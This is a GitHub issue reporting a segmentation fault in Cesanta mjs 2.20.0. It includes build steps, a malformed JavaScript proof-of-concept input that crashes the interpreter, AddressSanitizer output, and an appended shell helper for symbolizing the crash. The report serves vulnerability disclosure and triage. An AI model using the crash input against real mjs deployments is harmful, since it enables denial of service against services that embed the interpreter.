SEGV (/mjs/mjs+0x4ec508)
vorfreuder opened this issue · 0 comments
vorfreuder commented
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.
Vulnerability Type
segmentation violation
Environment
- Operating System
Distributor ID: Ubuntu
Description: Ubuntu 18.04.6 LTS
Release: 18.04
Codename: bionic
- Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix
Steps to Reproduce
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
poc
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify-= i;
c /= 0, c = 0let s = '08888888888888 true, "x": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
run command
mjs -f poc
ASAN info
AddressSanitizer:DEADLYSIGNAL
=================================================================
==139==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004ec508 (pc 0x0000004ec508 bp 0x7ffe0c9ce3d0 sp 0x7ffe0c9cdb58 T0)
==139==The signal is caused by a WRITE memory access.
#0 0x4ec508 (/mjs/mjs+0x4ec508)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/mjs/mjs+0x4ec508)
==139==ABORTING
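The trace above was produced from a binary built without debug info and without a symbolizer, so the only actionable datum is the module offset 0x4ec508. The triage helper below is an added example, not part of this report or of the mjs project; it assumes a POSIX shell with sed, clang with ASAN, addr2line from binutils, and (for run_poc) llvm-symbolizer on PATH, run inside the mjs checkout at commit b1b6eac.

```shell
#!/bin/sh
# Added triage helper, not from the original report or the mjs project.
# Assumes: POSIX sh, sed, clang with ASAN, addr2line (binutils).

# Constructed sample: the SUMMARY line from the report above.
ASAN_SUMMARY='SUMMARY: AddressSanitizer: SEGV (/mjs/mjs+0x4ec508)'

# asan_module LINE: print the module path from an ASAN frame/SUMMARY line
# (e.g. /mjs/mjs); prints nothing if the line has no "(module+0xOFFSET)".
asan_module() {
    printf '%s\n' "$1" | sed -n 's/.*(\([^+()]*\)+0x[0-9a-fA-F]*).*/\1/p'
}

# asan_offset LINE: print the module-relative offset (e.g. 0x4ec508).
asan_offset() {
    printf '%s\n' "$1" | sed -n 's/.*(\([^+()]*\)+\(0x[0-9a-fA-F]*\)).*/\2/p'
}

# rebuild_with_symbols: the same build as in the report, plus debug info and
# frame pointers so ASAN can print a symbolized backtrace.
rebuild_with_symbols() {
    clang -g -fno-omit-frame-pointer -fsanitize=address -DMJS_MAIN mjs.c -o mjs
}

# run_poc FILE: run the PoC with the symbolizer enabled so each frame shows
# function and file:line instead of a bare offset.
run_poc() {
    ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH="$(command -v llvm-symbolizer)" \
        ./mjs -f "$1"
}

# symbolize_summary LINE: map the offset in an already captured trace to
# function and file:line with addr2line. Needs the -g rebuild; the
# stripped binary from the report only yields "?? ??:0".
symbolize_summary() {
    mod=$(asan_module "$1")
    off=$(asan_offset "$1")
    if [ -z "$mod" ] || [ -z "$off" ]; then
        echo "no (module+offset) found in: $1" >&2
        return 1
    fi
    addr2line -f -p -e "$mod" "$off"
}
```

After rebuild_with_symbols, `run_poc poc` should reproduce the same fault with a symbolized frame, which is what a maintainer needs to locate the bad write; symbolize_summary serves the case where only the pasted trace is at hand.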